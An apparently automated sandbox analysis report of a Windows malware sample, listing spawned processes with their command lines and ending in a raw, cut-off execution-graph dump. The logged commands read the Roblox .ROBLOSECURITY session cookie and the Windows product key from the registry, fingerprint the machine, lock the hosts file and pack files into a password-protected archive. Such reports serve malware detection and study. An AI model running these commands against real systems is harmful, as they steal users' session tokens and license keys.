                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:46
                                                                                                                                                                    Start time:22:16:04
                                                                                                                                                                    Start date:15/09/2023
                                                                                                                                                                    Path:C:\Windows\System32\attrib.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:attrib +r C:\Windows\System32\drivers\etc\hosts
                                                                                                                                                                    Imagebase:0x7ff609bc0000
                                                                                                                                                                    File size:21'504 bytes
                                                                                                                                                                    MD5 hash:FDC601145CD289C6FBC96D3F805F3CD7
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:47
                                                                                                                                                                    Start time:22:16:04
                                                                                                                                                                    Start date:15/09/2023
                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                                                                                                    Imagebase:0x7ff7a8120000
                                                                                                                                                                    File size:273'920 bytes
                                                                                                                                                                    MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:48
                                                                                                                                                                    Start time:22:16:04
                                                                                                                                                                    Start date:15/09/2023
                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                    Imagebase:0x7ff6bab10000
                                                                                                                                                                    File size:625'664 bytes
                                                                                                                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:49
                                                                                                                                                                    Start time:22:16:04
                                                                                                                                                                    Start date:15/09/2023
                                                                                                                                                                    Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:tasklist /FO LIST
                                                                                                                                                                    Imagebase:0x7ff667630000
                                                                                                                                                                    File size:100'352 bytes
                                                                                                                                                                    MD5 hash:B12E0F9C42075B4B7AD01D0B6A48485D
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:50
                                                                                                                                                                    Start time:22:16:04
                                                                                                                                                                    Start date:15/09/2023
                                                                                                                                                                    Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESCCB6.tmp" "c:\Users\user\AppData\Local\Temp\ozweafg0\CSCCDFC3EC49286452EA176429826C32718.TMP"
                                                                                                                                                                    Imagebase:0x7ff7a7bb0000
                                                                                                                                                                    File size:52'744 bytes
                                                                                                                                                                    MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:51
                                                                                                                                                                    Start time:22:16:05
                                                                                                                                                                    Start date:15/09/2023
                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                                                                                                                                    Imagebase:0x7ff7a8120000
                                                                                                                                                                    File size:273'920 bytes
                                                                                                                                                                    MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:52
                                                                                                                                                                    Start time:22:16:05
                                                                                                                                                                    Start date:15/09/2023
                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                    Imagebase:0x7ff6bab10000
                                                                                                                                                                    File size:625'664 bytes
                                                                                                                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:53
                                                                                                                                                                    Start time:22:16:05
                                                                                                                                                                    Start date:15/09/2023
                                                                                                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                                                                                                                    Imagebase:0x7ff6afba0000
                                                                                                                                                                    File size:447'488 bytes
                                                                                                                                                                    MD5 hash:95000560239032BC68B4C2FDFCDEF913
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:.Net C# or VB.NET
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:54
                                                                                                                                                                    Start time:22:16:07
                                                                                                                                                                    Start date:15/09/2023
                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                                                                                                                                    Imagebase:0x7ff7a8120000
                                                                                                                                                                    File size:273'920 bytes
                                                                                                                                                                    MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:55
                                                                                                                                                                    Start time:22:16:07
                                                                                                                                                                    Start date:15/09/2023
                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                    Imagebase:0x7ff6bab10000
                                                                                                                                                                    File size:625'664 bytes
                                                                                                                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:56
                                                                                                                                                                    Start time:22:16:07
                                                                                                                                                                    Start date:15/09/2023
                                                                                                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                                                                                                                    Imagebase:0x7ff6afba0000
                                                                                                                                                                    File size:447'488 bytes
                                                                                                                                                                    MD5 hash:95000560239032BC68B4C2FDFCDEF913
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:.Net C# or VB.NET
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:57
                                                                                                                                                                    Start time:22:16:12
                                                                                                                                                                    Start date:15/09/2023
                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI68562\rar.exe a -r -hp"Zsombec1234" "C:\Users\user\AppData\Local\Temp\7sLxM.zip" *"
                                                                                                                                                                    Imagebase:0x7ff7a8120000
                                                                                                                                                                    File size:273'920 bytes
                                                                                                                                                                    MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:58
                                                                                                                                                                    Start time:22:16:12
                                                                                                                                                                    Start date:15/09/2023
                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                    Imagebase:0x7ff6bab10000
                                                                                                                                                                    File size:625'664 bytes
                                                                                                                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:59
                                                                                                                                                                    Start time:22:16:12
                                                                                                                                                                    Start date:15/09/2023
                                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\_MEI68562\rar.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Users\user\AppData\Local\Temp\_MEI68562\rar.exe a -r -hp"Zsombec1234" "C:\Users\user\AppData\Local\Temp\7sLxM.zip" *
                                                                                                                                                                    Imagebase:0x7ff6ee730000
                                                                                                                                                                    File size:630'736 bytes
                                                                                                                                                                    MD5 hash:9C223575AE5B9544BC3D69AC6364F75E
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Antivirus matches:
                                                                                                                                                                    • Detection: 0%, ReversingLabs
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:60
                                                                                                                                                                    Start time:22:16:13
                                                                                                                                                                    Start date:15/09/2023
                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c "wmic os get Caption"
                                                                                                                                                                    Imagebase:0x7ff7a8120000
                                                                                                                                                                    File size:273'920 bytes
                                                                                                                                                                    MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:61
                                                                                                                                                                    Start time:22:16:13
                                                                                                                                                                    Start date:15/09/2023
                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                    Imagebase:0x7ff6bab10000
                                                                                                                                                                    File size:625'664 bytes
                                                                                                                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:62
                                                                                                                                                                    Start time:22:16:13
                                                                                                                                                                    Start date:15/09/2023
                                                                                                                                                                    Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:wmic os get Caption
                                                                                                                                                                    Imagebase:0x7ff6a2030000
                                                                                                                                                                    File size:521'728 bytes
                                                                                                                                                                    MD5 hash:EC80E603E0090B3AC3C1234C2BA43A0F
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:63
                                                                                                                                                                    Start time:22:16:14
                                                                                                                                                                    Start date:15/09/2023
                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
                                                                                                                                                                    Imagebase:0x7ff7a8120000
                                                                                                                                                                    File size:273'920 bytes
                                                                                                                                                                    MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:64
                                                                                                                                                                    Start time:22:16:14
                                                                                                                                                                    Start date:15/09/2023
                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                    Imagebase:0x7ff6bab10000
                                                                                                                                                                    File size:625'664 bytes
                                                                                                                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:65
                                                                                                                                                                    Start time:22:16:14
                                                                                                                                                                    Start date:15/09/2023
                                                                                                                                                                    Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:wmic computersystem get totalphysicalmemory
                                                                                                                                                                    Imagebase:0x7ff6a2030000
                                                                                                                                                                    File size:521'728 bytes
                                                                                                                                                                    MD5 hash:EC80E603E0090B3AC3C1234C2BA43A0F
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:66
                                                                                                                                                                    Start time:22:16:15
                                                                                                                                                                    Start date:15/09/2023
                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                                                                                                                                    Imagebase:0x7ff7a8120000
                                                                                                                                                                    File size:273'920 bytes
                                                                                                                                                                    MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:67
                                                                                                                                                                    Start time:22:16:15
                                                                                                                                                                    Start date:15/09/2023
                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                    Imagebase:0x7ff6bab10000
                                                                                                                                                                    File size:625'664 bytes
                                                                                                                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:68
                                                                                                                                                                    Start time:22:16:15
                                                                                                                                                                    Start date:15/09/2023
                                                                                                                                                                    Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:wmic csproduct get uuid
                                                                                                                                                                    Imagebase:0x7ff6a2030000
                                                                                                                                                                    File size:521'728 bytes
                                                                                                                                                                    MD5 hash:EC80E603E0090B3AC3C1234C2BA43A0F
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:69
                                                                                                                                                                    Start time:22:16:16
                                                                                                                                                                    Start date:15/09/2023
                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
                                                                                                                                                                    Imagebase:0x7ff7a8120000
                                                                                                                                                                    File size:273'920 bytes
                                                                                                                                                                    MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:70
                                                                                                                                                                    Start time:22:16:16
                                                                                                                                                                    Start date:15/09/2023
                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                    Imagebase:0x7ff6bab10000
                                                                                                                                                                    File size:625'664 bytes
                                                                                                                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:71
                                                                                                                                                                    Start time:22:16:16
                                                                                                                                                                    Start date:15/09/2023
                                                                                                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                                                                                                                                                    Imagebase:0x7ff6afba0000
                                                                                                                                                                    File size:447'488 bytes
                                                                                                                                                                    MD5 hash:95000560239032BC68B4C2FDFCDEF913
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:.Net C# or VB.NET
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:72
                                                                                                                                                                    Start time:22:16:16
                                                                                                                                                                    Start date:15/09/2023
                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                                                                                                                                                    Imagebase:0x7ff7a8120000
                                                                                                                                                                    File size:273'920 bytes
                                                                                                                                                                    MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:73
                                                                                                                                                                    Start time:22:16:16
                                                                                                                                                                    Start date:15/09/2023
                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                    Imagebase:0x7ff6bab10000
                                                                                                                                                                    File size:625'664 bytes
                                                                                                                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:74
                                                                                                                                                                    Start time:22:16:17
                                                                                                                                                                    Start date:15/09/2023
                                                                                                                                                                    Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:wmic path win32_VideoController get name
                                                                                                                                                                    Imagebase:0x7ff6a2030000
                                                                                                                                                                    File size:521'728 bytes
                                                                                                                                                                    MD5 hash:EC80E603E0090B3AC3C1234C2BA43A0F
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:75
                                                                                                                                                                    Start time:22:16:17
                                                                                                                                                                    Start date:15/09/2023
                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
                                                                                                                                                                    Imagebase:0x7ff7a8120000
                                                                                                                                                                    File size:273'920 bytes
                                                                                                                                                                    MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:76
                                                                                                                                                                    Start time:22:16:17
                                                                                                                                                                    Start date:15/09/2023
                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                    Imagebase:0x7ff6bab10000
                                                                                                                                                                    File size:625'664 bytes
                                                                                                                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:77
                                                                                                                                                                    Start time:22:16:17
                                                                                                                                                                    Start date:15/09/2023
                                                                                                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
                                                                                                                                                                    Imagebase:0x7ff6afba0000
                                                                                                                                                                    File size:447'488 bytes
                                                                                                                                                                    MD5 hash:95000560239032BC68B4C2FDFCDEF913
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:.Net C# or VB.NET
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    Disassembly

                                                                                                                                                                    Reset < >

                                                                                                                                                                      Execution Graph

                                                                                                                                                                      Execution Coverage:12.1%
                                                                                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                      Signature Coverage:18.8%
                                                                                                                                                                      Total number of Nodes:2000
                                                                                                                                                                      Total number of Limit Nodes:71
                                                                                                                                                                      execution_graph 17996 7ff614c9950e 17997 7ff614c9951e 17996->17997 18000 7ff614c84328 LeaveCriticalSection 17997->18000 18525 7ff614c99694 18528 7ff614c84328 LeaveCriticalSection 18525->18528 17942 7ff614c8e90c 17943 7ff614c8eafe 17942->17943 17945 7ff614c8e94e _isindst 17942->17945 17944 7ff614c84474 _set_fmode 11 API calls 17943->17944 17962 7ff614c8eaee 17944->17962 17945->17943 17948 7ff614c8e9ce _isindst 17945->17948 17946 7ff614c7adb0 _wfindfirst32i64 8 API calls 17947 7ff614c8eb19 17946->17947 17963 7ff614c953e4 17948->17963 17953 7ff614c8eb2a 17954 7ff614c89e00 _wfindfirst32i64 17 API calls 17953->17954 17956 7ff614c8eb3e 17954->17956 17960 7ff614c8ea2b 17960->17962 17987 7ff614c95428 17960->17987 17962->17946 17964 7ff614c8e9ec 17963->17964 17965 7ff614c953f3 17963->17965 17969 7ff614c947e8 17964->17969 17994 7ff614c8f7b8 EnterCriticalSection 17965->17994 17970 7ff614c947f1 17969->17970 17972 7ff614c8ea01 17969->17972 17971 7ff614c84474 _set_fmode 11 API calls 17970->17971 17973 7ff614c947f6 17971->17973 17972->17953 17975 7ff614c94818 17972->17975 17974 7ff614c89de0 _invalid_parameter_noinfo 37 API calls 17973->17974 17974->17972 17976 7ff614c94821 17975->17976 17977 7ff614c8ea12 17975->17977 17978 7ff614c84474 _set_fmode 11 API calls 17976->17978 17977->17953 17981 7ff614c94848 17977->17981 17979 7ff614c94826 17978->17979 17980 7ff614c89de0 _invalid_parameter_noinfo 37 API calls 17979->17980 17980->17977 17982 7ff614c94851 17981->17982 17983 7ff614c8ea23 17981->17983 17984 7ff614c84474 _set_fmode 11 API calls 17982->17984 17983->17953 17983->17960 17985 7ff614c94856 17984->17985 17986 7ff614c89de0 _invalid_parameter_noinfo 37 API calls 17985->17986 17986->17983 17995 7ff614c8f7b8 EnterCriticalSection 17987->17995 18792 7ff614c88a80 18795 7ff614c88a00 18792->18795 18802 7ff614c8f7b8 EnterCriticalSection 18795->18802 17769 7ff614c88584 17770 7ff614c88594 17769->17770 17771 7ff614c8859d 17769->17771 17770->17771 17775 7ff614c88094 17770->17775 17776 7ff614c880ad 17775->17776 17777 7ff614c880a9 17775->17777 17796 7ff614c91bac GetEnvironmentStringsW 17776->17796 17777->17771 17788 7ff614c88454 17777->17788 17780 7ff614c880ba 17782 7ff614c89e48 __free_lconv_mon 11 API calls 17780->17782 17781 7ff614c880c6 17803 7ff614c88214 17781->17803 17782->17777 17785 7ff614c89e48 __free_lconv_mon 11 API calls 17786 7ff614c880ed 17785->17786 17787 7ff614c89e48 __free_lconv_mon 11 API calls 17786->17787 17787->17777 17789 7ff614c88477 17788->17789 17790 7ff614c8848e 17788->17790 17789->17771 17790->17789 17791 7ff614c8dd70 _set_fmode 11 API calls 17790->17791 17792 7ff614c8e820 MultiByteToWideChar _fread_nolock 17790->17792 17793 7ff614c88502 17790->17793 17795 7ff614c89e48 __free_lconv_mon 11 API calls 17790->17795 17791->17790 17792->17790 17794 7ff614c89e48 __free_lconv_mon 11 API calls 17793->17794 17794->17789 17795->17790 17797 7ff614c91bd0 17796->17797 17798 7ff614c880b2 17796->17798 17799 7ff614c8cafc _fread_nolock 12 API calls 17797->17799 17798->17780 17798->17781 17800 7ff614c91c07 memcpy_s 17799->17800 17801 7ff614c89e48 __free_lconv_mon 11 API calls 17800->17801 17802 7ff614c91c27 FreeEnvironmentStringsW 17801->17802 17802->17798 17804 7ff614c8823c 17803->17804 17805 7ff614c8dd70 _set_fmode 11 API calls 17804->17805 17814 7ff614c88277 17805->17814 17806 7ff614c89e48 __free_lconv_mon 11 API calls 17807 7ff614c880ce 17806->17807 17807->17785 17808 7ff614c882f9 17809 7ff614c89e48 __free_lconv_mon 11 API calls 17808->17809 17809->17807 17810 7ff614c8dd70 _set_fmode 11 API calls 17810->17814 17811 7ff614c882e8 17822 7ff614c88330 17811->17822 17812 7ff614c8f954 _wfindfirst32i64 37 API calls 17812->17814 17814->17808 17814->17810 17814->17811 17814->17812 17816 